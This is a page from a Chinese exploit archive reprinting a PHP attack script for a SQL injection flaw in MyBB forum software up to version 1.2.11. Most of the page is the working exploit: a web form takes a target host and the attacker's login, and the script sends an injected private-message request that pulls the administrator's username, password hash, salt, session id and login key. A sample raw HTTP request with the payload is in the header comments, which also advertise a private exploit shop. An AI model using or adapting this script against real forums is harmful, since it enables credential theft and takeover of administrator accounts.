手机
当前位置:查字典教程网 >网络安全 >Exploit >MyBulletinBoard (MyBB)
MyBulletinBoard (MyBB)
摘要:

<?php

// forum mybb <= 1.2.11 remote sql injection vulnerability

// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html

// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)

//

// POST http://mybb.ru/forum/private.php HTTP/1.1

// Host: mybb.ru

// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW

// Content-Type: application/x-www-form-urlencoded

// Content-Length: 479

// Connection: Close

//

// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with <3 from ru_antichat',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=4),(select password from mybb_users where uid=4),(select salt from mybb_users where uid=4),admin_sid',(select sid from mybb_adminsessions where uid=4),'admin_loginkey',(select loginkey from mybb_adminsessions where uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send

//

// greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth

// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*

// 25.01.08 error_reporting(0);

@ini_set("max_execution_time",0);

@ini_set('output_buffering',0);

@set_magic_quotes_runtime(0);

@set_time_limit(0);

@ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8rn");

header("Pragma: no-cache"); ?> <html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>mybb 1.2.11 xek</title>

<style>

<!--

A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}

A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}

A:active {COLOR: #228B22; TEXT-DECORATION: none}

A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}

BODY

{

margin="5";

FONT-WEIGHT: normal;

COLOR: #B9B9BD;

BACKGROUND: #44474F;

FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif;

} -->

</style>

</head>

<body> <?php function myflush($timee)

{

if(ob_get_contents())

{

ob_flush();

ob_clean();

flush();

usleep($timee);

}

} if (!$_GET)

{

echo

'<form action="'.$_SERVER['PHP_SELF'].'?f**k_mybb" method="post">

<input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" type="submit" value="&#8194;get admin passwd...&#8194;"><br><br>

<input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="hostname">

<font color="#B9B9BD">&#8194;&#172; for expamle "expdb.cc"<br>

<input style="background-color: #31333B; color: #B9B9BD;" name="patch" value="patch">

<font color="#B9B9BD">&#8194;&#172; patch 2 mybb forum, for expamle "community/mybb"<br>

<input style="background-color: #31333B; color: #B9B9BD;" name="username" value="username">

<font color="#B9B9BD">&#8194;&#172; you username on this forum, for expamle "c411k"<br>

<input style="background-color: #31333B; color: #B9B9BD;" name="pwd" value="password">

<font color="#B9B9BD">&#8194;&#172; you password, for expamle "h1world"<br>

<input style="background-color: #31333B; color: #B9B9BD;" name="uid_needed" value="1">

<font color="#B9B9BD">&#8194;&#172; admin id, default 1<br>

</form>';

}

if (isset($_GET['f**k_mybb']))

{

$username = ($_POST['username']);

$pwd = ($_POST['pwd']);

$host_mybb = ($_POST['hostname']);

$patch_mybb = ($_POST['patch']);

$uid_needed = ($_POST['uid_needed']);

$login_mybb = 'member.php';

$pm_mybb = 'private.php';

$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http://localhost/mybb_1210/index.php'; function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)

{

global $send_http;

$s = array();

$url = fsockopen($host, 80);

$send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1rn";

$send_http .= "Host: $hostrn";

$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7rn";

$send_http .= "Cookie: $cook1ern";

$send_http .= "Content-Type: application/x-www-form-urlencodedrn";

$send_http .= "Content-Length: ".strlen($data_gp)."rn";

$send_http .= "Connection: Closernrn";

if ($method === 'POST')

{

$send_http .= $data_gp;

}

//print_r($send_http);

fputs($url, $send_http);

while (!feof($url)) $s[] = fgets($url, 1028);

fclose($url);

return $s;

} echo '<pre>- start....';

myflush(50000); $get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'f**kkk');

echo '<pre>- login '.$username.' with passwd = '.$pwd.' done';

myflush(50000); foreach ($get_cookie as $value)

{

if (strpos($value, 'Set-Cookie: mybbuser=') !== false)

{

$value = explode(";", $value);

$cookie = strstr($value[0], 'mybbuser');

break;

}

}

echo '<pre>- cookie: '.$cookie;

myflush(50000); preg_match("/mybbuser=(.*)_/", $cookie, $m);

$get_uid = $m[1];

echo '<pre>- user id: '.$get_uid;

myflush(50000); $data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with <3 from antichat.ru',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=$uid_needed),(select password from mybb_users where uid=$uid_needed),(select salt from mybb_users where uid=$uid_needed),' admin sid',(select sid from mybb_adminsessions where uid=$uid_needed),' admin loginkey',(select loginkey from mybb_adminsessions where uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";

sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);

echo '<pre>- send exploit:

-------------------

'.$send_http.'

-------------------

look you private messages 4 admin passwd hash <a href=http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.' target=_blank>http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'</a>';

}

?> </body>

</html>

【MyBulletinBoard (MyBB)】相关文章:

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Debian Sarge Multiple IMAP Server Denial of Service Exploit

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

EO Video 1.36 Local Heap Overflow DOS / PoC

Simple PHP Blog (SPHPBlog)

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

Mole Group Real Estate Script

Maian Search

Joomla Component DT Register Remote SQL injection Vulnerability

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC

精品推荐
分类导航